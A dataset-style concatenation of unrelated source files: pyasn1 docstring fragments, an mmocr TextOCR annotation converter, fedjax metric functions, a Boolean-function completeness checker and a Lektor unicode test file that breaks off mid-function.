# # This file is part of pyasn1 software. # # Copyright (c) 2005-2017, <NAME> <<EMAIL>> # License: http://pyasn1.sf.net/license.html # Creates |ASN.1| type or object. |ASN.1| objects are immutable and duck-type Python 2 :class:`unicode` or Python 3 :class:`str`. When used in octet-stream context, |ASN.1| type assumes "|encoding|" encoding. Parameters ---------- value: :class:`unicode`, :class:`str`, :class:`bytes` or |ASN.1| object unicode object (Python 2) or string (Python 3), alternatively string (Python 2) or bytes (Python 3) representing octet-stream of serialized unicode string (note `encoding` parameter) or |ASN.1| class instance. tagSet: :py:class:`~pyasn1.type.tag.TagSet` Object representing non-default ASN.1 tag(s) subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection` Object representing non-default ASN.1 subtype constraint(s) encoding: :py:class:`str` Unicode codec ID to encode/decode :class:`unicode` (Python 2) or :class:`str` (Python 3) the payload when |ASN.1| object is used in octet-stream context. Raises ------ : :py:class:`pyasn1.error.PyAsn1Error` On constraint violation or bad initializer. Creates a copy of a |ASN.1| type or object. Any parameters to the *clone()* method will replace corresponding properties of the |ASN.1| object. Parameters ---------- value: :class:`unicode`, :class:`str`, :class:`bytes` or |ASN.1| object unicode object (Python 2) or string (Python 3), alternatively string (Python 2) or bytes (Python 3) representing octet-stream of serialized unicode string (note `encoding` parameter) or |ASN.1| class instance. tagSet: :py:class:`~pyasn1.type.tag.TagSet` Object representing non-default ASN.1 tag(s) subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection` Object representing non-default ASN.1 subtype constraint(s) encoding: :py:class:`str` Unicode codec ID to encode/decode :py:class:`unicode` (Python 2) or :py:class:`str` (Python 3) the payload when |ASN.1| object is used in octet-stream context. Returns ------- : new instance of |ASN.1| type/value Creates a copy of a |ASN.1| type or object. Any parameters to the *subtype()* method will be added to the corresponding properties of the |ASN.1| object. Parameters ---------- value: :class:`unicode`, :class:`str`, :class:`bytes` or |ASN.1| object unicode object (Python 2) or string (Python 3), alternatively string (Python 2) or bytes (Python 3) representing octet-stream of serialized unicode string (note `encoding` parameter) or |ASN.1| class instance. implicitTag: :py:class:`~pyasn1.type.tag.Tag` Implicitly apply given ASN.1 tag object to caller's :py:class:`~pyasn1.type.tag.TagSet`, then use the result as new object's ASN.1 tag(s). explicitTag: :py:class:`~pyasn1.type.tag.Tag` Explicitly apply given ASN.1 tag object to caller's :py:class:`~pyasn1.type.tag.TagSet`, then use the result as new object's ASN.1 tag(s). subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection` Object representing non-default ASN.1 subtype constraint(s) encoding: :py:class:`str` Unicode codec ID to encode/decode :py:class:`unicode` (Python 2) or :py:class:`str` (Python 3) the payload when |ASN.1| object is used in octet-stream context. Returns ------- : new instance of |ASN.1| type/value #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. # Optimization for faster codec lookup #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. # Optimization for faster codec lookup #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. # Optimization for faster codec lookup # Optimization for faster codec lookup #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. # Optimization for faster codec lookup #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. # Optimization for faster codec lookup #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. # Optimization for faster codec lookup #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. # Optimization for faster codec lookup # Optimization for faster codec lookup #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. # Optimization for faster codec lookup #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. # Optimization for faster codec lookup #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. # Optimization for faster codec lookup #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. # Optimization for faster codec lookup
| 2.078594
| 2
|
tools/data/textdet/textocr_converter.py
|
xyzhu8/mmocr
| 1
|
6628058
|
import argparse
import math
import os.path as osp
import mmcv
from mmocr.utils import convert_annotations
def parse_args():
parser = argparse.ArgumentParser(
description='Generate training and validation set of TextOCR ')
parser.add_argument('root_path', help='Root dir path of TextOCR')
args = parser.parse_args()
return args
def collect_textocr_info(root_path, annotation_filename, print_every=1000):
annotation_path = osp.join(root_path, annotation_filename)
if not osp.exists(annotation_path):
raise Exception(
f'{annotation_path} not exists, please check and try again.')
annotation = mmcv.load(annotation_path)
# img_idx = img_start_idx
img_infos = []
for i, img_info in enumerate(annotation['imgs'].values()):
if i > 0 and i % print_every == 0:
print(f'{i}/{len(annotation["imgs"].values())}')
img_info['segm_file'] = annotation_path
ann_ids = annotation['imgToAnns'][img_info['id']]
anno_info = []
for ann_id in ann_ids:
ann = annotation['anns'][ann_id]
# Ignore illegible or non-English words
text_label = ann['utf8_string']
iscrowd = 1 if text_label == '.' else 0
x, y, w, h = ann['bbox']
x, y = max(0, math.floor(x)), max(0, math.floor(y))
w, h = math.ceil(w), math.ceil(h)
bbox = [x, y, w, h]
segmentation = [max(0, int(x)) for x in ann['points']]
anno = dict(
iscrowd=iscrowd,
category_id=1,
bbox=bbox,
area=ann['area'],
segmentation=[segmentation])
anno_info.append(anno)
img_info.update(anno_info=anno_info)
img_infos.append(img_info)
return img_infos
def main():
args = parse_args()
root_path = args.root_path
print('Processing training set...')
training_infos = collect_textocr_info(root_path, 'TextOCR_0.1_train.json')
convert_annotations(training_infos,
osp.join(root_path, 'instances_training.json'))
print('Processing validation set...')
val_infos = collect_textocr_info(root_path, 'TextOCR_0.1_val.json')
convert_annotations(val_infos, osp.join(root_path, 'instances_val.json'))
print('Finish')
if __name__ == '__main__':
main()
|
import argparse
import math
import os.path as osp
import mmcv
from mmocr.utils import convert_annotations
def parse_args():
parser = argparse.ArgumentParser(
description='Generate training and validation set of TextOCR ')
parser.add_argument('root_path', help='Root dir path of TextOCR')
args = parser.parse_args()
return args
def collect_textocr_info(root_path, annotation_filename, print_every=1000):
annotation_path = osp.join(root_path, annotation_filename)
if not osp.exists(annotation_path):
raise Exception(
f'{annotation_path} not exists, please check and try again.')
annotation = mmcv.load(annotation_path)
# img_idx = img_start_idx
img_infos = []
for i, img_info in enumerate(annotation['imgs'].values()):
if i > 0 and i % print_every == 0:
print(f'{i}/{len(annotation["imgs"].values())}')
img_info['segm_file'] = annotation_path
ann_ids = annotation['imgToAnns'][img_info['id']]
anno_info = []
for ann_id in ann_ids:
ann = annotation['anns'][ann_id]
# Ignore illegible or non-English words
text_label = ann['utf8_string']
iscrowd = 1 if text_label == '.' else 0
x, y, w, h = ann['bbox']
x, y = max(0, math.floor(x)), max(0, math.floor(y))
w, h = math.ceil(w), math.ceil(h)
bbox = [x, y, w, h]
segmentation = [max(0, int(x)) for x in ann['points']]
anno = dict(
iscrowd=iscrowd,
category_id=1,
bbox=bbox,
area=ann['area'],
segmentation=[segmentation])
anno_info.append(anno)
img_info.update(anno_info=anno_info)
img_infos.append(img_info)
return img_infos
def main():
args = parse_args()
root_path = args.root_path
print('Processing training set...')
training_infos = collect_textocr_info(root_path, 'TextOCR_0.1_train.json')
convert_annotations(training_infos,
osp.join(root_path, 'instances_training.json'))
print('Processing validation set...')
val_infos = collect_textocr_info(root_path, 'TextOCR_0.1_val.json')
convert_annotations(val_infos, osp.join(root_path, 'instances_val.json'))
print('Finish')
if __name__ == '__main__':
main()
|
en
| 0.436393
|
# img_idx = img_start_idx # Ignore illegible or non-English words
| 2.578764
| 3
|
fedjax/legacy/core/metrics.py
|
alshedivat/fedjax
| 0
|
6628059
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Metrics."""
import abc
import numbers
from typing import Any, Optional, Tuple
from fedjax.legacy.core import dataclasses
import jax
import jax.numpy as jnp
# Small constant to add to denominator to avoid division by 0.
_SAFE_DIVIDE = 1e-10
class Metric(metaclass=abc.ABCMeta):
"""Interface for all metric containers (e.g. accuracy).
`Metric` stores intermediate values as well as methods for accumulation and
final result computation.
"""
@abc.abstractmethod
def merge(self, other: 'Metric') -> 'Metric':
"""Merges `self` and `other` into a new single accumulated metric."""
@abc.abstractmethod
def result(self) -> jnp.ndarray:
"""Computes final metric result from intermediate values."""
def __str__(self) -> str:
"""Returns human readable string representation of metric."""
return f'{repr(self)} => {self.result()}'
def _is_scalar(x):
if isinstance(x, jnp.ndarray):
return x.ndim == 0
return isinstance(x, numbers.Number)
@dataclasses.dataclass
class MeanMetric(Metric):
"""Implementation for metrics that are reduced by averaging (total / count).
Attributes:
total: Scalar sum of intermediate values.
count: Scalar number of intermediate values.
"""
total: jnp.ndarray
count: jnp.ndarray
def __post_init__(self):
if not (_is_scalar(self.total) and _is_scalar(self.count)):
raise TypeError('total and count must both be scalars.')
@classmethod
def from_values(cls,
values: jnp.ndarray,
weights: Optional[jnp.ndarray] = None) -> 'MeanMetric':
"""Constructs MeanMetric from intermediate values and optional weights.
Args:
values: Array of intermediate values.
weights: Array of weights for each intermediate value of the same shape as
values. Defaults to unweighted.
Returns:
MeanMetric for (possibly weighted) average of values.
"""
if weights is None:
weights = jnp.ones_like(values)
return cls(total=jnp.sum(values * weights), count=jnp.sum(weights))
def merge(self, other: 'MeanMetric') -> 'MeanMetric':
return type(self)(
total=self.total + other.total, count=self.count + other.count)
def result(self) -> jnp.ndarray:
return self.total / jnp.maximum(self.count, _SAFE_DIVIDE)
@dataclasses.dataclass
class CountMetric(Metric):
"""Implementation for counter metrics (e.g. num_out_of_vocabulary_words)."""
count: jnp.ndarray
def __post_init__(self):
if not _is_scalar(self.count):
raise TypeError('count must be a scalar.')
def merge(self, other: 'CountMetric') -> 'CountMetric':
return type(self)(count=self.count + other.count)
def result(self) -> jnp.ndarray:
return self.count
def _unreduced_cross_entropy_loss_fn(targets: jnp.ndarray,
preds: jnp.ndarray) -> jnp.ndarray:
"""Returns unreduced cross entropy loss."""
num_classes = preds.shape[-1]
log_preds = jax.nn.log_softmax(preds)
one_hot_targets = jax.nn.one_hot(targets, num_classes)
return -jnp.sum(one_hot_targets * log_preds, axis=-1)
def cross_entropy_loss_fn(targets: jnp.ndarray,
preds: jnp.ndarray) -> MeanMetric:
"""Computes cross entropy loss.
Args:
targets: Target values of shape [batch_size, ...] in range [0, num_classes).
preds: Unnormalized model output of shape [batch_size, ..., num_classes].
Returns:
Metric for loss.
"""
unreduced_loss = _unreduced_cross_entropy_loss_fn(targets, preds)
return MeanMetric.from_values(unreduced_loss)
def masked_cross_entropy_loss_fn(
targets: jnp.ndarray, preds: jnp.ndarray,
mask_values: Tuple[int, ...] = ()) -> MeanMetric:
"""Computes cross entropy loss after discounting masked values.
Args:
targets: Target values of shape [batch_size, ...] in range [0, num_classes).
preds: Unnormalized model output of shape [batch_size, ..., num_classes].
mask_values: Target values to be masked and not counted in loss.
Returns:
Metric for masked loss.
"""
weights = jnp.ones_like(targets, dtype=preds.dtype)
for mv in mask_values:
weights *= (targets != mv)
unreduced_loss = _unreduced_cross_entropy_loss_fn(targets, preds)
return MeanMetric.from_values(unreduced_loss, weights=weights)
def accuracy_fn(targets: jnp.ndarray, preds: jnp.ndarray) -> MeanMetric:
"""Computes accuracy.
Args:
targets: Target values of shape [batch_size, ...] in range [0, num_classes).
preds: Unnormalized model output of shape [batch_size, ..., num_classes].
Returns:
Metric for accuracy.
"""
pred_class = jnp.argmax(preds, axis=-1)
return MeanMetric.from_values(pred_class == targets)
def masked_accuracy_fn(
targets: jnp.ndarray,
preds: jnp.ndarray,
mask_values: Tuple[int, ...] = (),) -> MeanMetric:
"""Computes accuracy after discounting masked values.
Args:
targets: Target values of shape [batch_size, ...] in range [0, num_classes).
preds: Unnormalized model output of shape [batch_size, ..., num_classes].
mask_values: Target values to be masked and not counted in accuracy.
Returns:
Metric for masked accuracy.
"""
weights = jnp.ones_like(targets, dtype=preds.dtype)
for mv in mask_values:
weights *= (targets != mv)
pred_class = jnp.argmax(preds, axis=-1)
return MeanMetric.from_values(pred_class == targets, weights=weights)
def masked_accuracy_fn_with_logits_mask(
targets: jnp.ndarray,
preds: jnp.ndarray,
logits_mask: jnp.ndarray,
mask_values: Tuple[int, ...] = (),
) -> MeanMetric:
"""Computes accuracy after discounting masked values.
Args:
targets: Target values of shape [batch_size, ...] in range [0, num_classes).
preds: Unnormalized model output of shape [batch_size, ..., num_classes].
logits_mask: Mask of shape [num_classes] to be applied for preds.
mask_values: Target values to be masked and not counted in accuracy.
Returns:
Metric for masked accuracy with logits mask.
"""
weights = jnp.ones_like(targets, dtype=preds.dtype)
for mv in mask_values:
weights *= (targets != mv)
preds = preds + logits_mask
pred_class = jnp.argmax(preds, axis=-1)
return MeanMetric.from_values(pred_class == targets, weights=weights)
def masked_count(targets: jnp.ndarray,
mask_values: Tuple[Any, ...] = ()) -> CountMetric:
"""Counts total number of non masked targets."""
weights = jnp.ones_like(targets, dtype=jnp.int32)
for mv in mask_values:
weights *= (targets != mv)
return CountMetric(count=jnp.sum(weights))
def truncation_rate(targets: jnp.ndarray,
eos_value: int,
pad_value: int) -> MeanMetric:
"""Computes the proportion of sequence examples that were truncated.
Args:
targets: Target values of shape [batch_size, sequence_length, ...].
eos_value: Target value denoting end of sequence. Truncated sequences will
not have this value.
pad_value: Optional target value for padding to discount empty sequences.
Returns:
Metric for trucation rate.
"""
not_empty = jnp.any(targets != pad_value, axis=1)
is_truncated = jnp.all(targets != eos_value, axis=1) * not_empty
return MeanMetric(total=jnp.sum(is_truncated), count=jnp.sum(not_empty))
def oov_rate(
targets: jnp.ndarray,
oov_values: Tuple[int, ...],
mask_values: Tuple[int, ...] = ()) -> MeanMetric:
"""Computes proportion of non masked tokens that are out of vocabulary.
Args:
targets: Target values of shape [batch_size, sequence_length, ...].
oov_values: Target values denoting out of vocabulary values.
mask_values: Target values to be masked and not counted in metric.
Returns:
Metric for out of vocabulary rate.
"""
weights = jnp.ones_like(targets, dtype=jnp.float32)
for mv in mask_values:
weights *= (targets != mv)
num_non_masked = jnp.sum(weights)
for ov in oov_values:
weights *= (targets == ov)
num_oov = jnp.sum(weights)
return MeanMetric(total=num_oov, count=num_non_masked)
def sequence_length(targets: jnp.ndarray, pad_value: int) -> MeanMetric:
"""Computes length of sequence examples by number of non-pad tokens."""
non_pad_mask = targets != pad_value
not_empty = jnp.any(non_pad_mask, axis=1)
num_non_pad = jnp.sum(non_pad_mask, axis=1)
return MeanMetric(total=jnp.sum(num_non_pad), count=jnp.sum(not_empty))
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Metrics."""
import abc
import numbers
from typing import Any, Optional, Tuple
from fedjax.legacy.core import dataclasses
import jax
import jax.numpy as jnp
# Small constant to add to denominator to avoid division by 0.
_SAFE_DIVIDE = 1e-10
class Metric(metaclass=abc.ABCMeta):
"""Interface for all metric containers (e.g. accuracy).
`Metric` stores intermediate values as well as methods for accumulation and
final result computation.
"""
@abc.abstractmethod
def merge(self, other: 'Metric') -> 'Metric':
"""Merges `self` and `other` into a new single accumulated metric."""
@abc.abstractmethod
def result(self) -> jnp.ndarray:
"""Computes final metric result from intermediate values."""
def __str__(self) -> str:
"""Returns human readable string representation of metric."""
return f'{repr(self)} => {self.result()}'
def _is_scalar(x):
if isinstance(x, jnp.ndarray):
return x.ndim == 0
return isinstance(x, numbers.Number)
@dataclasses.dataclass
class MeanMetric(Metric):
"""Implementation for metrics that are reduced by averaging (total / count).
Attributes:
total: Scalar sum of intermediate values.
count: Scalar number of intermediate values.
"""
total: jnp.ndarray
count: jnp.ndarray
def __post_init__(self):
if not (_is_scalar(self.total) and _is_scalar(self.count)):
raise TypeError('total and count must both be scalars.')
@classmethod
def from_values(cls,
values: jnp.ndarray,
weights: Optional[jnp.ndarray] = None) -> 'MeanMetric':
"""Constructs MeanMetric from intermediate values and optional weights.
Args:
values: Array of intermediate values.
weights: Array of weights for each intermediate value of the same shape as
values. Defaults to unweighted.
Returns:
MeanMetric for (possibly weighted) average of values.
"""
if weights is None:
weights = jnp.ones_like(values)
return cls(total=jnp.sum(values * weights), count=jnp.sum(weights))
def merge(self, other: 'MeanMetric') -> 'MeanMetric':
return type(self)(
total=self.total + other.total, count=self.count + other.count)
def result(self) -> jnp.ndarray:
return self.total / jnp.maximum(self.count, _SAFE_DIVIDE)
@dataclasses.dataclass
class CountMetric(Metric):
"""Implementation for counter metrics (e.g. num_out_of_vocabulary_words)."""
count: jnp.ndarray
def __post_init__(self):
if not _is_scalar(self.count):
raise TypeError('count must be a scalar.')
def merge(self, other: 'CountMetric') -> 'CountMetric':
return type(self)(count=self.count + other.count)
def result(self) -> jnp.ndarray:
return self.count
def _unreduced_cross_entropy_loss_fn(targets: jnp.ndarray,
preds: jnp.ndarray) -> jnp.ndarray:
"""Returns unreduced cross entropy loss."""
num_classes = preds.shape[-1]
log_preds = jax.nn.log_softmax(preds)
one_hot_targets = jax.nn.one_hot(targets, num_classes)
return -jnp.sum(one_hot_targets * log_preds, axis=-1)
def cross_entropy_loss_fn(targets: jnp.ndarray,
preds: jnp.ndarray) -> MeanMetric:
"""Computes cross entropy loss.
Args:
targets: Target values of shape [batch_size, ...] in range [0, num_classes).
preds: Unnormalized model output of shape [batch_size, ..., num_classes].
Returns:
Metric for loss.
"""
unreduced_loss = _unreduced_cross_entropy_loss_fn(targets, preds)
return MeanMetric.from_values(unreduced_loss)
def masked_cross_entropy_loss_fn(
targets: jnp.ndarray, preds: jnp.ndarray,
mask_values: Tuple[int, ...] = ()) -> MeanMetric:
"""Computes cross entropy loss after discounting masked values.
Args:
targets: Target values of shape [batch_size, ...] in range [0, num_classes).
preds: Unnormalized model output of shape [batch_size, ..., num_classes].
mask_values: Target values to be masked and not counted in loss.
Returns:
Metric for masked loss.
"""
weights = jnp.ones_like(targets, dtype=preds.dtype)
for mv in mask_values:
weights *= (targets != mv)
unreduced_loss = _unreduced_cross_entropy_loss_fn(targets, preds)
return MeanMetric.from_values(unreduced_loss, weights=weights)
def accuracy_fn(targets: jnp.ndarray, preds: jnp.ndarray) -> MeanMetric:
"""Computes accuracy.
Args:
targets: Target values of shape [batch_size, ...] in range [0, num_classes).
preds: Unnormalized model output of shape [batch_size, ..., num_classes].
Returns:
Metric for accuracy.
"""
pred_class = jnp.argmax(preds, axis=-1)
return MeanMetric.from_values(pred_class == targets)
def masked_accuracy_fn(
targets: jnp.ndarray,
preds: jnp.ndarray,
mask_values: Tuple[int, ...] = (),) -> MeanMetric:
"""Computes accuracy after discounting masked values.
Args:
targets: Target values of shape [batch_size, ...] in range [0, num_classes).
preds: Unnormalized model output of shape [batch_size, ..., num_classes].
mask_values: Target values to be masked and not counted in accuracy.
Returns:
Metric for masked accuracy.
"""
weights = jnp.ones_like(targets, dtype=preds.dtype)
for mv in mask_values:
weights *= (targets != mv)
pred_class = jnp.argmax(preds, axis=-1)
return MeanMetric.from_values(pred_class == targets, weights=weights)
def masked_accuracy_fn_with_logits_mask(
targets: jnp.ndarray,
preds: jnp.ndarray,
logits_mask: jnp.ndarray,
mask_values: Tuple[int, ...] = (),
) -> MeanMetric:
"""Computes accuracy after discounting masked values.
Args:
targets: Target values of shape [batch_size, ...] in range [0, num_classes).
preds: Unnormalized model output of shape [batch_size, ..., num_classes].
logits_mask: Mask of shape [num_classes] to be applied for preds.
mask_values: Target values to be masked and not counted in accuracy.
Returns:
Metric for masked accuracy with logits mask.
"""
weights = jnp.ones_like(targets, dtype=preds.dtype)
for mv in mask_values:
weights *= (targets != mv)
preds = preds + logits_mask
pred_class = jnp.argmax(preds, axis=-1)
return MeanMetric.from_values(pred_class == targets, weights=weights)
def masked_count(targets: jnp.ndarray,
mask_values: Tuple[Any, ...] = ()) -> CountMetric:
"""Counts total number of non masked targets."""
weights = jnp.ones_like(targets, dtype=jnp.int32)
for mv in mask_values:
weights *= (targets != mv)
return CountMetric(count=jnp.sum(weights))
def truncation_rate(targets: jnp.ndarray,
eos_value: int,
pad_value: int) -> MeanMetric:
"""Computes the proportion of sequence examples that were truncated.
Args:
targets: Target values of shape [batch_size, sequence_length, ...].
eos_value: Target value denoting end of sequence. Truncated sequences will
not have this value.
pad_value: Optional target value for padding to discount empty sequences.
Returns:
Metric for trucation rate.
"""
not_empty = jnp.any(targets != pad_value, axis=1)
is_truncated = jnp.all(targets != eos_value, axis=1) * not_empty
return MeanMetric(total=jnp.sum(is_truncated), count=jnp.sum(not_empty))
def oov_rate(
targets: jnp.ndarray,
oov_values: Tuple[int, ...],
mask_values: Tuple[int, ...] = ()) -> MeanMetric:
"""Computes proportion of non masked tokens that are out of vocabulary.
Args:
targets: Target values of shape [batch_size, sequence_length, ...].
oov_values: Target values denoting out of vocabulary values.
mask_values: Target values to be masked and not counted in metric.
Returns:
Metric for out of vocabulary rate.
"""
weights = jnp.ones_like(targets, dtype=jnp.float32)
for mv in mask_values:
weights *= (targets != mv)
num_non_masked = jnp.sum(weights)
for ov in oov_values:
weights *= (targets == ov)
num_oov = jnp.sum(weights)
return MeanMetric(total=num_oov, count=num_non_masked)
def sequence_length(targets: jnp.ndarray, pad_value: int) -> MeanMetric:
"""Computes length of sequence examples by number of non-pad tokens."""
non_pad_mask = targets != pad_value
not_empty = jnp.any(non_pad_mask, axis=1)
num_non_pad = jnp.sum(non_pad_mask, axis=1)
return MeanMetric(total=jnp.sum(num_non_pad), count=jnp.sum(not_empty))
|
en
| 0.810994
|
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Metrics. # Small constant to add to denominator to avoid division by 0. Interface for all metric containers (e.g. accuracy). `Metric` stores intermediate values as well as methods for accumulation and final result computation. Merges `self` and `other` into a new single accumulated metric. Computes final metric result from intermediate values. Returns human readable string representation of metric. Implementation for metrics that are reduced by averaging (total / count). Attributes: total: Scalar sum of intermediate values. count: Scalar number of intermediate values. Constructs MeanMetric from intermediate values and optional weights. Args: values: Array of intermediate values. weights: Array of weights for each intermediate value of the same shape as values. Defaults to unweighted. Returns: MeanMetric for (possibly weighted) average of values. Implementation for counter metrics (e.g. num_out_of_vocabulary_words). Returns unreduced cross entropy loss. Computes cross entropy loss. Args: targets: Target values of shape [batch_size, ...] in range [0, num_classes). preds: Unnormalized model output of shape [batch_size, ..., num_classes]. Returns: Metric for loss. Computes cross entropy loss after discounting masked values. Args: targets: Target values of shape [batch_size, ...] in range [0, num_classes). preds: Unnormalized model output of shape [batch_size, ..., num_classes]. mask_values: Target values to be masked and not counted in loss. Returns: Metric for masked loss. Computes accuracy. Args: targets: Target values of shape [batch_size, ...] in range [0, num_classes). preds: Unnormalized model output of shape [batch_size, ..., num_classes]. Returns: Metric for accuracy. Computes accuracy after discounting masked values. Args: targets: Target values of shape [batch_size, ...] in range [0, num_classes). preds: Unnormalized model output of shape [batch_size, ..., num_classes]. mask_values: Target values to be masked and not counted in accuracy. Returns: Metric for masked accuracy. Computes accuracy after discounting masked values. Args: targets: Target values of shape [batch_size, ...] in range [0, num_classes). preds: Unnormalized model output of shape [batch_size, ..., num_classes]. logits_mask: Mask of shape [num_classes] to be applied for preds. mask_values: Target values to be masked and not counted in accuracy. Returns: Metric for masked accuracy with logits mask. Counts total number of non masked targets. Computes the proportion of sequence examples that were truncated. Args: targets: Target values of shape [batch_size, sequence_length, ...]. eos_value: Target value denoting end of sequence. Truncated sequences will not have this value. pad_value: Optional target value for padding to discount empty sequences. Returns: Metric for trucation rate. Computes proportion of non masked tokens that are out of vocabulary. Args: targets: Target values of shape [batch_size, sequence_length, ...]. oov_values: Target values denoting out of vocabulary values. mask_values: Target values to be masked and not counted in metric. Returns: Metric for out of vocabulary rate. Computes length of sequence examples by number of non-pad tokens.
| 2.453875
| 2
|
Diskret/1stLab/task3.py
|
ShuffleZZZ/ITMO
| 11
|
6628060
|
def save1(c):
if (c[-1]=='1'):
return 1
return 0
def save0(c):
if (c[0]=='0'):
return 1
return 0
def dv(c, n):
if (n==0):
return 0
for i in range(2**(n-1)):
if (c[i]==c[-i-1]):
return 0
return 1
def mono(c,n):
if n==0:
return 1
l = c[:2**(n-1)]
r = c[2**(n-1):]
for i in range(2**(n-1)):
if (l[i]=='1' and r[i]=='0'):
return 0
return mono(l,n-1) and mono(r,n-1)
def line(c, n):
tr = list(map(int,c))
for i in range(1,2**n):
for j in range(2**n-1,i-1,-1):
tr[j] =(tr[j]+tr[j-1])%2
st=[0,1,2,4,8,16,32]
for i in range(2**n):
if tr[i]==1 and not i in st:
return 0
return 1
n =int(input())
arr=list()
for i in range(n):
arr.append(input().split())
arr[i][0]=int(arr[i][0])
k1=0
k2=0
k3=0
k4=0
k5=0
for i in range(n):
if (save1(arr[i][1])==0):
k1=1
if (save0(arr[i][1])==0):
k2=1
if (dv(arr[i][1],arr[i][0])==0):
k3=1
if (mono(arr[i][1],arr[i][0])==0):
k4=1
if (line(arr[i][1],arr[i][0])==0):
k5=1
if (k1==k2==k3==k4==k5==1):
print('YES')
else:
print('NO')
|
def save1(c):
if (c[-1]=='1'):
return 1
return 0
def save0(c):
if (c[0]=='0'):
return 1
return 0
def dv(c, n):
if (n==0):
return 0
for i in range(2**(n-1)):
if (c[i]==c[-i-1]):
return 0
return 1
def mono(c,n):
if n==0:
return 1
l = c[:2**(n-1)]
r = c[2**(n-1):]
for i in range(2**(n-1)):
if (l[i]=='1' and r[i]=='0'):
return 0
return mono(l,n-1) and mono(r,n-1)
def line(c, n):
tr = list(map(int,c))
for i in range(1,2**n):
for j in range(2**n-1,i-1,-1):
tr[j] =(tr[j]+tr[j-1])%2
st=[0,1,2,4,8,16,32]
for i in range(2**n):
if tr[i]==1 and not i in st:
return 0
return 1
n =int(input())
arr=list()
for i in range(n):
arr.append(input().split())
arr[i][0]=int(arr[i][0])
k1=0
k2=0
k3=0
k4=0
k5=0
for i in range(n):
if (save1(arr[i][1])==0):
k1=1
if (save0(arr[i][1])==0):
k2=1
if (dv(arr[i][1],arr[i][0])==0):
k3=1
if (mono(arr[i][1],arr[i][0])==0):
k4=1
if (line(arr[i][1],arr[i][0])==0):
k5=1
if (k1==k2==k3==k4==k5==1):
print('YES')
else:
print('NO')
|
none
| 1
| 2.983406
| 3
|
|
tests/test_unicode.py
|
arabidopsis/lektor
| 0
|
6628061
|
# coding: utf-8
import os
from lektor.build_programs import BuildError
from lektor.builder import Builder
from lektor.db import Database
from lektor.environment import Environment
from lektor.project import Project
from lektor.reporter import BufferReporter
def get_unicode_builder(tmpdir):
proj = Project.from_path(
os.path.join(os.path.dirname(__file__), u"ünicöde-project")
)
env = Environment(proj)
pad = Database(env).new_pad()
return pad, Builder(pad, str(tmpdir.mkdir("output")))
def test_unicode_project_folder(tmpdir):
pad, builder = get_unicode_builder(tmpdir)
prog, _ = builder.build(pad.root)
with prog.artifacts[0].open("rb") as f:
assert f.read() == b"<h1>Hello</h1>\n<p>W\xc3\xb6rld</p>\n\n"
def test_unicode_attachment_filename(tmpdir):
pad, builder = get_unicode_builder(tmpdir)
with BufferReporter(builder.env) as reporter:
prog, _ = builder.build(pad.root.attachments.first())
# pylint: disable=no-member
failures = reporter.get_failures()
assert len(failures) == 0
with prog.artifacts[0].open("rb") as f:
assert f.read().rstrip() == b"attachment"
def test_bad_file_ignored(tmpdir):
pad, builder = get_unicode_builder(tmpdir)
record = pad.root.children.first()
with BufferReporter(builder.env) as reporter:
prog, _ = builder.build(record)
# pylint: disable=no-member
failures = reporter.get_failures()
assert len(failures) == 1
exc_info = failures[0]["exc_info"]
assert exc_info[0] is BuildError
assert (
"The URL for this record contains non "
"ASCII characters" in exc_info[1].message
)
|
# coding: utf-8
import os
from lektor.build_programs import BuildError
from lektor.builder import Builder
from lektor.db import Database
from lektor.environment import Environment
from lektor.project import Project
from lektor.reporter import BufferReporter
def get_unicode_builder(tmpdir):
proj = Project.from_path(
os.path.join(os.path.dirname(__file__), u"ünicöde-project")
)
env = Environment(proj)
pad = Database(env).new_pad()
return pad, Builder(pad, str(tmpdir.mkdir("output")))
def test_unicode_project_folder(tmpdir):
